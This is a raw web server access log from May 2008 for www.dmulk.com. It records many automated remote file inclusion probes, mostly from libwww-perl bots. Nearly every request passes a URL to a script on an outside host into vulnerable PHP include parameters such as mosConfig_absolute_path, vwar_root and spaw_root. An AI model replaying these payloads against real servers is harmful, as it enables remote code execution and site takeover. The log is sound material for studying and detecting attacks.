208.116.44.60 - - [28/May/2008:09:22:39 -0700] "GET /logs/tutunghttp://h1.ripway.com/bongku/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:09:23:15 -0700] "GET /logs/access_080106.log/components/com_extcalendar/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:23:16 -0700] "GET /claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:09:23:24 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:09:23:47 -0700] "GET /logs/access_080401.log//option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
218.234.21.89 - - [28/May/2008:09:23:49 -0700] "GET /logs/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
218.234.21.89 - - [28/May/2008:09:23:50 -0700] "GET /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:24:31 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:24:41 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:25:02 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:09:25:08 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.116.44.60 - - [28/May/2008:09:25:12 -0700] "GET /logs/access_080307.log/tutunghttp://h1.ripway.com/bongku/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:25:30 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.103.40 - - [28/May/2008:09:26:13 -0700] "GET //eqdkp/admin/index.php?s=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
212.227.103.40 - - [28/May/2008:09:26:13 -0700] "GET /logs//eqdkp/admin/index.php?s=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:26:32 -0700] "GET /claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.85.34 - - [28/May/2008:09:26:34 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://o-x-r-a-n-a.ru/forum/language/.lang/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.85.34 - - [28/May/2008:09:26:34 -0700] "GET //common/db.php?commonpath=http://o-x-r-a-n-a.ru/forum/language/.lang/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.85.34 - - [28/May/2008:09:26:34 -0700] "GET /logs//common/db.php?commonpath=http://o-x-r-a-n-a.ru/forum/language/.lang/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.29.100 - - [28/May/2008:09:26:42 -0700] "GET /logs/access_080125.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:09:26:49 -0700] "GET /logs/access_080228.log//modules/TotalCalendar/about.php?inc_dir=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:09:27:06 -0700] "GET /logs/access.log//components/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:09:27:07 -0700] "GET //components/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:09:27:07 -0700] "GET /logs//components/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.36.146 - - [28/May/2008:09:27:47 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://exquisitedreams.com/catalog/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.9.36.146 - - [28/May/2008:09:27:48 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://exquisitedreams.com/catalog/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:27:55 -0700] "GET /logs/access_080327.log//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:09:28:21 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:28:21 -0700] "GET /logs/access_080327.log//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:28:21 -0700] "GET /logs/access_080327.log//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:28:35 -0700] "GET /logs/access_080327.log//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:29:23 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:29:23 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:09:29:24 -0700] "GET /logs/access_071219.log//modules/vwar/admin/admin.php?vwar_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:09:29:26 -0700] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:29:39 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:29:40 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:29:51 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:29:51 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:29:51 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:29:54 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:29:54 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:29:54 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:29:56 -0700] "GET /logs/access_080102.log//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:09:29:58 -0700] "GET /logs/access_080106.log//modules/vwar/admin/admin.php?vwar_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:30:05 -0700] "GET /logs/access_080102.log//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.111.38 - - [28/May/2008:09:30:06 -0700] "GET /administrator/components/com_peoplebook/includes/dbal.include_dir=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
85.17.111.38 - - [28/May/2008:09:30:06 -0700] "GET /logs/administrator/components/com_peoplebook/includes/dbal.include_dir=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
209.62.80.134 - - [28/May/2008:09:30:44 -0700] "GET /administrator/components/com_peoplebook/includes/dbal.include_dir=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
209.62.80.134 - - [28/May/2008:09:30:44 -0700] "GET /logs/administrator/components/com_peoplebook/includes/dbal.include_dir=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
81.169.139.146 - - [28/May/2008:09:30:58 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.mh-arnis.de//cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
81.169.139.146 - - [28/May/2008:09:30:58 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.mh-arnis.de//cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:31:14 -0700] "GET /logs/access_080209.log/!scanhttp://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:31:14 -0700] "GET /!scanhttp://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:31:14 -0700] "GET /logs/!scanhttp://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.173.19.23 - - [28/May/2008:09:31:25 -0700] "GET /administrator/components/com_peoplebook/includes/dbal.include_dir=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
81.173.19.23 - - [28/May/2008:09:31:25 -0700] "GET /logs/administrator/components/com_peoplebook/includes/dbal.include_dir=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:31:26 -0700] "GET /logs/access_080216.log//?index.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:31:30 -0700] "GET //?index.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:31:33 -0700] "GET /logs//?index.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 200 49420 "-" "libwww-perl/5.803" "www.dmulk.com"
218.234.21.89 - - [28/May/2008:09:32:01 -0700] "GET /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
218.234.21.89 - - [28/May/2008:09:32:01 -0700] "GET /logs/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:32:24 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:32:35 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:32:37 -0700] "GET /administrator/components/com_peoplebook/includes/dbal.include_dir=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:32:38 -0700] "GET /logs/administrator/components/com_peoplebook/includes/dbal.include_dir=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:09:32:46 -0700] "GET /logs/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:09:32:46 -0700] "GET /modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:09:32:52 -0700] "GET /logs/access.log//components/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:09:32:52 -0700] "GET //components/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:09:32:53 -0700] "GET /logs//components/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.67.237.74 - - [28/May/2008:09:33:03 -0700] "GET /logs/index.php?pg=http://nad.nad.freesitespace.net/data/456.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.54.9.218 - - [28/May/2008:09:33:03 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://mfe-gay.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [28/May/2008:09:33:03 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://mfe-gay.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.67.237.74 - - [28/May/2008:09:33:05 -0700] "GET /index.php?pg=http://nad.nad.freesitespace.net/data/456.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:09:33:06 -0700] "GET /logs/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:09:33:07 -0700] "GET /errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.54.9.218 - - [28/May/2008:09:33:07 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://kiliclub.com/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [28/May/2008:09:33:08 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://kiliclub.com/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.9.163 - - [28/May/2008:09:33:23 -0700] "GET /logs/index.php?go=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [28/May/2008:09:33:25 -0700] "GET /index.php?go=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.63" "www.dmulk.com"
66.90.73.127 - - [28/May/2008:09:33:37 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:33:45 -0700] "GET /!scanhttp://gsis.bogo.net/bbs/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.76.116.20 - - [28/May/2008:09:33:49 -0700] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.76.116.20 - - [28/May/2008:09:33:49 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.76.116.20 - - [28/May/2008:09:33:50 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:09:33:50 -0700] "GET /logs//?index.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 200 49420 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:33:50 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:09:33:52 -0700] "GET //?index.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:33:56 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:33:56 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:34:31 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:34:31 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:09:34:44 -0700] "GET /logs//components/com_rsgallery/common/db.php=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:09:34:44 -0700] "GET //components/com_rsgallery/common/db.php=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.134.240.162 - - [28/May/2008:09:35:11 -0700] "GET /logs//modules/My_eGallery/index.php?include_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.134.240.162 - - [28/May/2008:09:35:11 -0700] "GET //modules/My_eGallery/index.php?include_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.230.197.245 - - [28/May/2008:09:35:15 -0700] "GET /!scanhttp://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.76.116.20 - - [28/May/2008:09:35:30 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:35:36 -0700] "GET /logs/access_080227.log/!scanhttp://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.134.122 - - [28/May/2008:09:35:36 -0700] "GET /logs/access_080118.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/.lang/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:09:35:42 -0700] "GET /logs/access_071224.log//modules/vwar/admin/admin.php?vwar_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.34.138.245 - - [28/May/2008:09:35:55 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:36:16 -0700] "GET /logs/access_080209.log/!scanhttp://gsis.bogo.net/bbs/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:36:16 -0700] "GET /logs/!scanhttp://gsis.bogo.net/bbs/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:09:36:52 -0700] "GET /logs/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:09:36:52 -0700] "GET /modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
151.11.24.250 - - [28/May/2008:09:36:57 -0700] "GET //modules/My_eGallery/index.php?include_path=http://omep.org.ar/boletin/language/bot/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
151.11.24.250 - - [28/May/2008:09:36:57 -0700] "GET /logs//modules/My_eGallery/index.php?include_path=http://omep.org.ar/boletin/language/bot/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
59.126.46.141 - - [28/May/2008:09:37:07 -0700] "GET //eqdkp/admin/index.php?s=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
59.126.46.141 - - [28/May/2008:09:37:07 -0700] "GET /logs//eqdkp/admin/index.php?s=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:09:37:17 -0700] "GET /logs/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:09:37:17 -0700] "GET /modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.76.116.20 - - [28/May/2008:09:37:24 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.76.116.20 - - [28/May/2008:09:37:26 -0700] "GET /logs/access_080228.log//modules/vwar/admin/admin.php?vwar_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:09:37:33 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
